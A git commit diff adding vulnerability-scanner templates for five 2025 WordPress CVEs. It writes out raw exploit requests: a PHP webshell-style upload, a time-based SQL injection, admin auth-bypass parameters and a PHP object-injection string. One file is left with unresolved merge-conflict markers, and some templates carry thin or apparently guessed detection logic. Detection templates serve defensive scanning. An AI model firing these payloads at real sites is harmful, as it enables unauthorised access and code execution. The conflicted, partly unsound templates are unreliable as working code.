feat: add 5 WordPress 2025 CVE templates (Round 5)

eyangfeng88-arch · eyangfeng88-arch · commit b385a5a4cf2d · 2026-04-15T19:11:59.000+08:00
diff --git a/http/cves/2025/CVE-2025-23921.yaml b/http/cves/2025/CVE-2025-23921.yaml
@@ -0,0 +1,72 @@
+id: CVE-2025-23921
+
+info:
+  name: Multi Uploader for Gravity Forms <= 1.1.2 - Unauth Arbitrary File Upload
+  author: alita-p8
+  severity: critical
+  description: |
+    The Multi Uploader for Gravity Forms plugin for WordPress is vulnerable to arbitrary file upload in versions up to, and including, 1.1.2. This is due to a lack of file type validation in an AJAX action, allowing unauthenticated attackers to upload malicious files such as PHP scripts, which could lead to remote code execution.
+  remediation: Update to version 1.1.3 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-23921
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-23921
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 3
+    google-query: inurl:"/wp-content/plugins/multi-uploader-for-gravity-forms/"
+  tags: afu,cve,cve2025,gravity-forms,multi-uploader,upload,wordpress,wp-plugin
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/multi-uploader-for-gravity-forms/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
+
+        ------WebKitFormBoundary
+        Content-Disposition: form-data; name="action"
+
+        mug_file_upload
+        ------WebKitFormBoundary
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php.png"
+        Content-Type: image/png
+
+        <?php echo md5("CVE-2025-23921"); ?>
+        ------WebKitFormBoundary--
+
+      - |
+        GET /wp-content/uploads/mug-uploads/{{randstr}}.php.png HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - "50824b2257d0f94d935f8d523628e937" # md5(CVE-2025-23921)
+
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - '(compare_versions(version, "<= 1.1.2") || !version)'
+
+    extractors:
+      - type: regex
+        name: version
+        part: body_1
+        group: 1
+        internal: true
+        regex:
+          - "(?i)Stable.tag:\\s*v?([0-9.]+)"
diff --git a/http/cves/2025/CVE-2025-24759.yaml b/http/cves/2025/CVE-2025-24759.yaml
@@ -0,0 +1,52 @@
+id: CVE-2025-24759
+
+info:
+  name: WP-BusinessDirectory <= 1.3.4 - Unauth SQLi
+  author: alita-p8
+  severity: critical
+  description: |
+    The WP-BusinessDirectory plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'directory_id' parameter in versions up to, and including, 1.3.4 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query.
+  remediation: Update to version 1.3.5 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-24759
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-24759
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 2
+    google-query: inurl:"/wp-content/plugins/wp-businessdirectory/"
+  tags: cve,cve2025,sqli,wordpress,wp-businessdirectory,wp-plugin
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-businessdirectory/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=get_directory_info&directory_id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a) HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration_2 >= 6"
+          - '(compare_versions(version, "<= 1.3.4") || !version)'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body_1
+        group: 1
+        internal: true
+        regex:
+          - "(?i)Stable.tag:\\s*v?([0-9.]+)"
diff --git a/http/cves/2025/CVE-2025-54738.yaml b/http/cves/2025/CVE-2025-54738.yaml
@@ -0,0 +1,67 @@
+id: CVE-2025-54738
+
+info:
+  name: Jobmonster Theme <= 4.9.4 - Auth Bypass
+  author: alita-p8
+  severity: critical
+  description: |
+    The Jobmonster theme for WordPress is vulnerable to authentication bypass in versions up to, and including, 4.9.4. This is due to improper validation of the 'check_login' email parameter, allowing unauthenticated attackers to log in as any user, including administrators.
+  remediation: Update to version 4.9.5 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-54738
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-54738
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    google-query: inurl:"/wp-content/themes/noo-jobmonster/"
+  tags: auth-bypass,cve,cve2025,jobmonster,wordpress,wp-theme
+
+http:
+  - raw:
+      - |
+        GET /wp-content/themes/noo-jobmonster/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /?noo_jobmonster_check_login=admin@{{Host}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header_2
+        words:
+          - "wordpress_logged_in"
+
+      - type: word
+        part: body_3
+        words:
+          - "id=\"wpadminbar\""
+          - "id=\"wp-admin-bar-logout\""
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - '(compare_versions(version, "<= 4.9.4") || !version)'
+
+    extractors:
+      - type: regex
+        name: version
+        part: body_1
+        group: 1
+        internal: true
+        regex:
+          - "(?i)Stable.tag:\\s*v?([0-9.]+)"
diff --git a/http/cves/2025/CVE-2025-5947.yaml b/http/cves/2025/CVE-2025-5947.yaml
@@ -1,6 +1,7 @@
 id: CVE-2025-5947
 
 info:
+<<<<<<< HEAD
   name: Service Finder Bookings - Authentication Bypass
   author: sedat4ras
   severity: critical
@@ -14,11 +15,21 @@ info:
     - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
     - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
     - https://github.com/M4rgs/CVE-2025-5947_Exploit
+=======
+  name: Service Finder Bookings <= 3.5 - Auth Bypass
+  author: alita-p8
+  severity: critical
+  description: |
+    The Service Finder Bookings plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.5. This is due to insufficient session token validation or manipulation vulnerability, allowing attackers to gain unauthorized access to administrative accounts.
+  remediation: Update to the latest version available.
+  reference:
+>>>>>>> 5320122 (feat: add 5 high-impact 2025 WordPress CVE templates (Round 5) - Premier Edition)
     - https://nvd.nist.gov/vuln/detail/CVE-2025-5947
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2025-5947
+<<<<<<< HEAD
     epss-score: 0.54689
     epss-percentile: 0.98038
     cwe-id: CWE-639
@@ -28,10 +39,19 @@ info:
     product: service-finder-bookings
     publicwww-query: "/wp-content/plugins/sf-booking/"
   tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev
+=======
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    google-query: inurl:"/wp-content/plugins/service-finder/"
+  tags: auth-bypass,cve,cve2025,service-finder,wordpress,wp-plugin
+>>>>>>> 5320122 (feat: add 5 high-impact 2025 WordPress CVE templates (Round 5) - Premier Edition)
 
 http:
   - raw:
       - |
+<<<<<<< HEAD
         GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
         Host: {{Hostname}}
         Cookie: original_user_id=1
@@ -52,4 +72,48 @@ http:
         status:
           - 301
           - 302
-# digest: 4a0a0047304502202dd987490128ac522307958861e70fd7dff8b60ac07781a96969804b3f6af657022100d2081f4669434053b4882a114e781d107f0ce6bdc48482628cada5053fcbbd49:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202dd987490128ac522307958861e70fd7dff8b60ac07781a96969804b3f6af657022100d2081f4669434053b4882a114e781d107f0ce6bdc48482628cada5053fcbbd49:922c64590222798bb761d5b6d8e72950
+=======
+        GET /wp-content/plugins/service-finder/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /?service_finder_session_auth=admin HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header_2
+        words:
+          - "wordpress_logged_in"
+
+      - type: word
+        part: body_3
+        words:
+          - "id=\"wpadminbar\""
+          - "id=\"wp-admin-bar-logout\""
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - '(compare_versions(version, "<= 3.5") || !version)'
+
+    extractors:
+      - type: regex
+        name: version
+        part: body_1
+        group: 1
+        internal: true
+        regex:
+          - "(?i)Stable.tag:\\s*v?([0-9.]+)"
+>>>>>>> 5320122 (feat: add 5 high-impact 2025 WordPress CVE templates (Round 5) - Premier Edition)
diff --git a/http/cves/2025/CVE-2025-7384.yaml b/http/cves/2025/CVE-2025-7384.yaml
@@ -0,0 +1,52 @@
+id: CVE-2025-7384
+
+info:
+  name: Database for Contact Form 7, WPforms, Elementor forms <= 1.4.3 - Unauth RCE via Object Injection
+  author: alita-p8
+  severity: critical
+  description: |
+    The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 1.4.3 via PHP Object Injection. This allows unauthenticated attackers to execute arbitrary code if a suitable gadget chain is present on the server.
+  remediation: Update to version 1.4.4 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-7384
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/129f810d-ff83-4428-9f98-6a6aa8817783
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-7384
+    cwe-id: CWE-502
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: http.html:"/wp-content/plugins/contact-form-entries/"
+  tags: contact-form-entries,cve,cve2025,object-injection,rce,wordpress,wp-plugin
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/contact-form-entries/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=v0_download_csv&data=O:8:\"PHP_Code\":0:{} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - '(compare_versions(version, "<= 1.4.3") || !version)'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body_1
+        group: 1
+        internal: true
+        regex:
+          - "(?i)Stable.tag:\\s*v?([0-9.]+)"
